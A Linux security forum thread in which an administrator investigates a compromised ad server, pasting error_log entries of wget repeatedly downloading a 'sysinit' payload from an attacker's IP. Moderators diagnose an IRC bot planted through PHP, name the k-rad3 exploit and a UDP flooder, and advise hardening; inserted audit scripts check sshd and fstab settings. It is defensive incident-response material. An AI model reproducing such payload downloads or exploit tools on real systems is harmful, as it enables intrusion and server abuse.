Linux - Security
02-14-2006, 03:09 PM | #1 | Member | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
DDOS/Hack? Need help to intepret and hunt source
Hi guys, happy Valentine's!
Well, I got a problem with some of my ad servers (running just ads).
Recently I noticed the following log entries in my /var/log/httpd/error_log, in all 4 servers (they're load balanced):
Quote:
--05:10:24-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.2'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.19 KB/s
05:10:26 (45.19 KB/s) - `sysinit.2' saved [31,973/31,973]
--09:08:35-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.3'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://212.78.204.20/pussylick3rz/sysinit/ [following]
--09:08:36-- http://212.78.204.20/pussylick3rz/sysinit/
=> `index.html'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.tripod.lycos.co.uk/error/404.phtml [following]
--09:08:36-- http://www.tripod.lycos.co.uk/error/404.phtml
=> `404.phtml'
Resolving www.tripod.lycos.co.uk... 212.78.204.130
Connecting to www.tripod.lycos.co.uk[212.78.204.130]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:08:37 ERROR 404: Not Found.
--09:09:46-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.3'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://212.78.204.20/pussylick3rz/sysinit/ [following]
--09:09:46-- http://212.78.204.20/pussylick3rz/sysinit/
=> `index.html'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.tripod.lycos.co.uk/error/404.phtml [following]
--09:09:47-- http://www.tripod.lycos.co.uk/error/404.phtml
=> `404.phtml'
Resolving www.tripod.lycos.co.uk... 212.78.204.130
Connecting to www.tripod.lycos.co.uk[212.78.204.130]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:09:47 ERROR 404: Not Found.
--09:25:53-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.3'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.14 KB/s
09:25:54 (45.14 KB/s) - `sysinit.3' saved [31,973/31,973]
--09:31:50-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.4'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 39.88 KB/s
09:31:51 (39.88 KB/s) - `sysinit.4' saved [31,973/31,973]
--09:53:35-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.5'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.13 KB/s
09:53:37 (45.13 KB/s) - `sysinit.5' saved [31,973/31,973]
--10:09:14-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.6'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 37.61 KB/s
10:09:15 (37.61 KB/s) - `sysinit.6' saved [31,973/31,973]
--11:45:01-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.7'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.06 KB/s
It goes on and on...
I tried to visit the URL but got a Lycos error saying no such page...
How can I go about finding out what started this page request? What's the best way?
I'm damn lost and frustrated... :S
02-14-2006, 06:09 PM | #2 | Moderator | Registered: May 2001 | Posts: 29,415
Quote: the following log entries in my /var/log/httpd/error_log (...) => sysinit.2 (...) 100%
Looks like an IRC bot.
Quote: i got a problem with some of my ads servers (...) how can i go about to find out what started this page request? wwhat's the best way?
Have you checked all running processes and temp dirs for these or any other anomalies?
Other logs? Chkrootkit or Rootkit Hunter (will probably find nothing)?
Checked for running any vulnerable apps on the webserver?
02-14-2006, 10:00 PM | #3 | Member (Original Poster) | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
Chkrootkit hunter? Is that an app?
My servers are basically running only httpd, named, mail. Nothing else... What to look out for here...?
Other than putting a REJECT in iptables... which I will be doing.
02-15-2006, 09:52 AM | #4 | Moderator | Registered: May 2001 | Posts: 29,415
Quote: chrootkit hunter? is that a app?
Search engine, your friend, is.
Quote: My servers are basically running only
Is this a guess or did you actually *check* it?
Quote: what to look out for here...?
Anything out of the ordinary. Could also be something that should not happen, for processes like running the max amount of children, for files setuid root in temp dirs. Anything in error logs. Any files open in unusual places.
02-16-2006, 03:38 AM | #5 | Member (Original Poster) | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
Ahh, sorry for my answers...
I do mean that I know those are the services that are running; of course there are more...
Sorry man, 'cos I'm really still a greenhorn when it comes to this, thus my questions/answers are like this...
Thanks for your patience with me too!
02-16-2006, 07:47 AM | #6 | Moderator | Registered: May 2001 | Posts: 29,415
Quote: sorry man, cos i'm really still a greenhorn when it comes to this, thus my questions/answers are like this.
Don't be sorry, just give us some info to work with please.
Quote: thanks for your patience with me too!
No, thank *you* for reminding me. I *really* should be more patient...
02-21-2006, 02:50 AM | #7 | Member (Original Poster) | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
OK, recently I just had a new case...
Found that they (whoever they are) put files in /tmp.
There are a few .c (Apache modules?) files there, whose uid:gid is apache. One of them is k-rad3.c, which, after googling it, is a rather new script but it's known.
There are some other .pl files too (let me know if you want me to post the files up).
What happened was that I had a bandwidth spike, and nobody could access my servers. I went to the server I suspected and lo and behold, the load was hovering around 1+, and it had a script called udp.pl running. I needed service to resume ASAP, so I issued a kill -9 on it... but alas, I found out only later that I should have at least done a 'stat' on it to find out when it was created...
Anyway, upon killing it, the load went down. My network is normal. My boss ordered me to reinstall the OS etc... but as all the servers in the same farm have the same kind of files (but strangely it only runs on this server), I'm concerned as to...
1) how did it find its way into the server in the first place
2) what is actually running them... automation?
It always left records in the error_log of httpd, thus allowing me to see which IP address it is connecting to to download a file called sysinit (which I believe is running these events..)
I have iptables in place, blocking in/out traffic to the IP addresses I saw. I have no SELinux in place. Essential?
I read about mod_security. Useful?
As I am typing this, I am restoring the affected machine, while leaving the other 3 alone for now... so hopefully I can get some pointers from you guys....
02-21-2006, 04:28 AM | #8 | Senior Member | Registered: Sep 2005 | Location: Out | Posts: 3,307
Is your machine currently connected to an IRC server? Do you do IRC yourself?
Do you have gcc installed?
Do you find anything interesting in doing this:
Code:
strings /proc/kcore | less
then search for JOIN by doing this:
02-21-2006, 07:11 AM | #9 | Moderator | Registered: May 2001 | Posts: 29,415
Quote: found that they (whoever they are) put files in /tmp. There's a few .c (apache modules?) files there, whose uid:gid is apache. one of them is k-rad3.c, which after googling it, is a rather new script but its known. have some other .pl files (let me know if you want me to post the files up)
No, k-rad3 is rather old (kernel <= 2.6.11): see CVE-2005-0736. If it's not been compiled: good. If you run a kernel upgraded to the latest: good. Any accompanying Perl files usually are flooders, backdoors and IRC bots. If you could save me a tarball anyway and email me a temp D/L location I'd appreciate it.
Quote: What happen was that I had a bandwidth spike, and nobody could access my servers.
Nice incentive to go looking, but a bit fatal (too late). I hope this leads to more detailed monitoring and using auditing apps.
Quote: lo and behold, the load was hovering around 1+, and it has a script call udp.pl running. I needed service to resume asap, so i issued a kill -9 on it... but alas i found out only later that i should have at least done a 'stat' on it to find when it was created... anyway, upon killing it, the load went down. my network is normal. My boss ordered me to reinstall the OS etc... but as all the servers in the same farms have the same kind of files found (but strangly it only runs on this server), i'm concern as to...
Quote: 1) how did it find its way into the server in the first place
By running any unpatched PHP application, most likely.
Quote: 2) what is actually running them... automation?
A set of URIs instructs it to download the stuff, then uses PHP system() to run it. That's why it's running as user Apache. Quite convenient because you don't need any higher privileged access to the system.
Quote: it always left records in the error_log of httpd, thus allowing me to see which ip address it is connecting to to download a file call sysinit (which i believe is running it these events..)
Search this forum for recent threads about sysinit and you'll also find out more info about hardening.
Quote: I have in place iptables, blocking in/out traffic to the ip addresses i saw.
...but you don't run egress filtering.
Quote: I have no SELinux in place. essential?
Probably, but it will probably take some time to configure well. The other option is the GRSecurity kernel patch (incompatible with running LSM).
Quote: I read abt mod_security. useful?
Yes, but you'll have to tune your regexes.
Quote: As I am typing this, I am restoring the affected machine, while leaving the other 3 alone first.. so hopefully i can get some pointers from you guys..
1. Harden the boxen. Search this forum for recent threads about sysinit and you'll also find out more info about hardening. Check out the LQ FAQ: Security references.
2. Regularly audit the boxen.
3. Always update software: there usually aren't any qualitatively good reasons not to. If the argument is about legacy apps or breakage then the focus is dead wrong: use a staging server to test, or try to counter by estimating the cost of downtime and mop-up *after* the boxen were broken.
4. Apply ingress and egress filtering.
@nx5000: Quote: Is your machine currently connected to an IRC server? Do you do IRC yourself?
Good questions. Any admin that uses a production box as his/her own playground isn't being professional and should be "re-educated".
Quote: Do you have gcc installed?
One of the textbook hardening procedures: restricting access to any compilers. Unfortunately it doesn't stop anything if you can introduce and run prefab binaries.
03-30-2006, 05:51 AM | #10 | Member (Original Poster) | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
Hey guys...
I have installed and run both chkrootkit and rkhunter; both give me good results other than 2 vulnerabilities listed by rkhunter:
1) SSH v1 Protocol used, Root user allowed login
2) /etc/.java - citing there's a vulnerability in the folder, asked me to check the folder
For (1), I already have "DenyUser" in sshd_config... no idea why they still mention that.
For (2), I took a look at the folder and there's only a .systemPref.
Can anyone advise me?
Also, it seems like rkhunter and chkrootkit are not compatible with RHEL4. If so, what do you guys recommend for use with RHEL4?
Many thanks!
03-30-2006, 07:22 AM | #11 | Moderator | Registered: May 2001 | Posts: 29,415
Quote: 1) SSH v1 Protocol used,
In /etc/ssh/sshd_config: "Protocol 2" (or 2,1 but ONLY if you have clients that don't understand protocol 2: so usually not).
Quote: Root user allowed login
In /etc/ssh/sshd_config: "PermitRootLogin no"
Quote: 2) /etc/.java - citing there's a vulnerability in the folder
Known false positive: check your rkhunter.conf for details.
Quote: For (1), I have already "DenyUser" in sshd_config... no idea why they still mention that
Give *exact* output / error lines please.
Quote: Also, seems like rkhunter and chkroothunter is not compatible with RHEL4.
Why not? Give *exact* output / error lines please.
Quote: Many thanks!
The last posts in this thread were made Feb 21st. You didn't care to respond to those.
I'd rather see you read those posts and do something with the advice than just *saying* "thanks".
Those are only words and don't mean a thing.
04-12-2006, 05:21 AM | #12 | Member (Original Poster) | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
Quote: Originally Posted by unSpawn (post #11, quoted in full)
Woah, steady, my words of thanks are from the bottom of my heart, really! My apologies for any misunderstanding here.
I just got back from an overseas attachment, thus I could only reply now, as I was in an area with almost no internet connection (Vietnam) and didn't want to access the servers via those cafes.
Quote:
from rkhunter
* Check: SSH
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
For the above I already have DenyUsers root in my sshd_config but didn't use the "PermitRootLogin" option (commented out).
But essentially, both work the same way, yah?
After I uncommented it and set it to 'No', it was OK.
For the protocol issue, it was commented out also. If I don't specify it, will it allow both 1 and 2 (like Protocol=2,1)?
/etc/.java issue
I found the following in the conf file... Should I enable it?
Quote:
# Allow hidden directory
# One directory per line (use multiple ALLOWHIDDENDIR lines)
#
#ALLOWHIDDENDIR=/etc/.java
# Allow hidden file
# One file per line (use multiple ALLOWHIDDENFILE lines)
#
#ALLOWHIDDENFILE=/etc/.java
RHEL4 Support Question
Quote:
[root@server rkhunter]# rkhunter -c --createlogfile
Rootkit Hunter 1.2.8 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped!
For chkrootkit, I misinterpreted the FAQ; I thought it was referring to the distro, but it's actually the kernel version.
For laughs... this is what I saw:
Quote:
3. Supported Systems
--------------------
chkrootkit has been tested on: Linux 2.0.x, 2.2.x, 2.4.x and 2.6.x,
FreeBSD 2.2.x, 3.x, 4.x and 5.x, OpenBSD 2.x and 3.x., NetBSD 1.6.x,
Solaris 2.5.1, 2.6, 8.0 and 9.0, HP-UX 11, Tru64, BSDI and Mac OS X.
OK, really, thanks for the attention.
04-12-2006, 08:37 AM | #13 | Moderator | Registered: May 2001 | Posts: 29,415
Quote: woah, steady (..) I just got back from an oversea attachment
OK, OK...
Quote: (..) Vietnam
Add ten points if you did manage to eat Durian...
Quote: but essentially, both works the same way yah?
Since there is a specific config directive "PermitRootLogin" I would argue it's *not* the same, but to be clear I'd have to look in the OpenSSH code to see how it's handled.
Quote: If I don't specify, it will allow both 1 and 2 (like Protocol =2,1) ?
"2,1" means prefer v2 and fall back to v1. There are only a few occasions where you would need v1 compatibility, and if you need it you would definitely know. I specify Protocol=2 on all my boxen.
Quote: /etc/.java issue I found the following in the conf file... i should enable it?
Yes.
Quote: RHEL4 Support Question (..) rkhunter -c --createlogfile (..) Determining OS... Unknown Warning: This operating system is not fully supported!
I posted a script here at LQ-SEC and to the Rkhunter mailing list to update sigs for releases that aren't supported yet. Check if you can use it, it's here: Announce: Rootkit Hunter: updating hash database (script).
Quote: For chkrootkit, i misinterpreted the faq, thought it was refering to the distro, but its actually kernel version
Affirmative. Cuz chkrootkit doesn't do distro/release specific checks like Rkhunter does.
Quote: Ok, really, thanks for the attention
NP. In the end that's what we're here for: to help you help yourself, essentially. Now the most important questions are: 0) what's your analysis of the situation (after auditing the box) and 1) what are you going to do? I mean, we've posted a lot of stuff that should help you combat this problem and I sure would appreciate knowing.
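The exchange above (DenyUsers root set, PermitRootLogin and Protocol commented out, rkhunter still warning until PermitRootLogin was set explicitly) comes down to which directive is actually active in sshd_config. The checker below is an added example, not code from the thread or from rkhunter: it reports the first active value of each directive the way sshd reads it, treats a commented-out directive as "unset", and then applies the two lines unSpawn recommended. The sample config is constructed to mirror the poster's situation.

```shell
#!/bin/sh
# Added example, not code from the thread: report the effective state of the
# two sshd_config items rkhunter flagged in this thread. A directive that is
# absent or commented out is reported as "unset", i.e. left at the sshd
# default rather than explicitly hardened. Constructed sample config mirroring
# the poster's situation: DenyUsers set, PermitRootLogin and Protocol commented.
SSHD_CFG=$(mktemp)
cat > "$SSHD_CFG" <<'EOF'
# This is the sshd server system-wide configuration file.
#Protocol 2,1
#PermitRootLogin yes
DenyUsers root
PasswordAuthentication yes
EOF

# Value of the first active occurrence of a directive, or "unset". sshd
# honours the first match, so a hardened line appended after an active one
# would be ignored; this function mirrors that rule.
sshd_value() {
    awk -v key="$2" '
        /^[ \t]*#/ || NF < 2 { next }
        tolower($1) == tolower(key) { print $2; found = 1; exit }
        END { if (!found) print "unset" }
    ' "$1"
}

# True only when v1 is fully disabled, i.e. an explicit "Protocol 2".
protocol_is_v2_only() { [ "$(sshd_value "$1" Protocol)" = "2" ]; }

# True only when root login is explicitly switched off.
root_login_disabled() { [ "$(sshd_value "$1" PermitRootLogin)" = "no" ]; }

# Summary in the spirit of rkhunter's SSH check.
sshd_audit() {
    cfg=$1
    if protocol_is_v2_only "$cfg"; then echo "Protocol: OK (2)"
    else echo "Protocol: WARNING ($(sshd_value "$cfg" Protocol)) - set 'Protocol 2'"; fi
    if root_login_disabled "$cfg"; then echo "PermitRootLogin: OK (no)"
    else echo "PermitRootLogin: WARNING ($(sshd_value "$cfg" PermitRootLogin)) - set 'PermitRootLogin no'"; fi
    [ "$(sshd_value "$cfg" DenyUsers)" = "unset" ] ||
        echo "Note: DenyUsers is set, but in this thread the warning cleared only once PermitRootLogin was set"
}

# Append the two hardened directives; valid here because neither is active yet.
harden_sshd() { printf 'Protocol 2\nPermitRootLogin no\n' >> "$1"; }

sshd_audit "$SSHD_CFG"
```

Point it at /etc/ssh/sshd_config to see what sshd will honour; if a directive already has an active line, edit that line rather than appending, since the first match wins.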
04-13-2006, 07:17 AM | #14 | Member (Original Poster) | Registered: Apr 2005 | Distribution: Red Hat / Fedora / CentOS | Posts: 508
Durian? I have that in my country.
But I didn't eat durian in Vietnam, lots of beef though.
So it's OK if I explicitly specify version 2 only?
Well... since the rootkit check software didn't show major malicious stuff... I did more searching and found out I can make /tmp non-executable by issuing a noexec in fstab.... Though not sure if I did it correctly, I tested that nothing could be executed (those 755 scripts loh).
Then also... when I had the "attacks",
I found some of the files in /var/tmp (by a stroke of luck, 'cos I didn't find any irregularities in the logs).
So following some online research, I deleted the folder and created a new one in place of it, which softlinks to /tmp.
Basically....
/var/tmp -> /tmp
So far.... still OK... but I am sure I can do better things with it... just that I haven't found out.
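Both directories the intruder used in this thread (/tmp and /var/tmp) can be checked from fstab rather than by trial execution of 755 scripts. The script below is an added example, not code from the thread: it reads the option field for each temp mount and flags any that lack noexec, nosuid and nodev; a directory with no fstab entry at all is flagged too. The sample fstab is constructed, with /tmp hardened and /var/tmp left at defaults.

```shell
#!/bin/sh
# Added example, not code from the thread: check that the temp directories
# written to in this thread are mounted with noexec, nosuid and nodev in
# fstab. Constructed sample fstab: /tmp hardened, /var/tmp left at defaults.
FSTAB=$(mktemp)
cat > "$FSTAB" <<'EOF'
# <device>   <mount>    <type>  <options>                     <dump> <pass>
/dev/sda1    /          ext3    defaults                      1 1
/dev/sda3    /tmp       ext3    defaults,noexec,nosuid,nodev  1 2
/dev/sda4    /var/tmp   ext3    defaults                      1 2
EOF

# Option list for a mount point, or "none" when fstab has no entry for it.
fstab_opts() {
    awk -v mp="$2" '/^[ \t]*#/ || NF < 4 { next }
                    $2 == mp { print $4; f = 1; exit }
                    END { if (!f) print "none" }' "$1"
}

# True when every required option appears in the comma-separated list.
has_opts() {
    opts=$1; shift
    for o in "$@"; do
        case ",$opts," in *",$o,"*) ;; *) return 1 ;; esac
    done
    return 0
}

# Report each temp directory; a missing entry is as bad as a missing option.
tmp_audit() {
    for mp in /tmp /var/tmp; do
        opts=$(fstab_opts "$1" "$mp")
        if has_opts "$opts" noexec nosuid nodev; then echo "$mp: OK ($opts)"
        else echo "$mp: WARNING ($opts) - add noexec,nosuid,nodev"; fi
    done
}

# Number of temp mounts still needing work; 0 means nothing left to fix.
tmp_warnings() { tmp_audit "$1" | grep -c WARNING; }

tmp_audit "$FSTAB"
```

With the symlink arrangement above (/var/tmp -> /tmp) there is no separate /var/tmp entry to check, so the audit reports it as missing; also note that noexec only blocks direct execution of files on that mount, a script handed to an interpreter elsewhere on the system still runs, so treat it as one layer alongside the auditing and patching advised earlier in the thread.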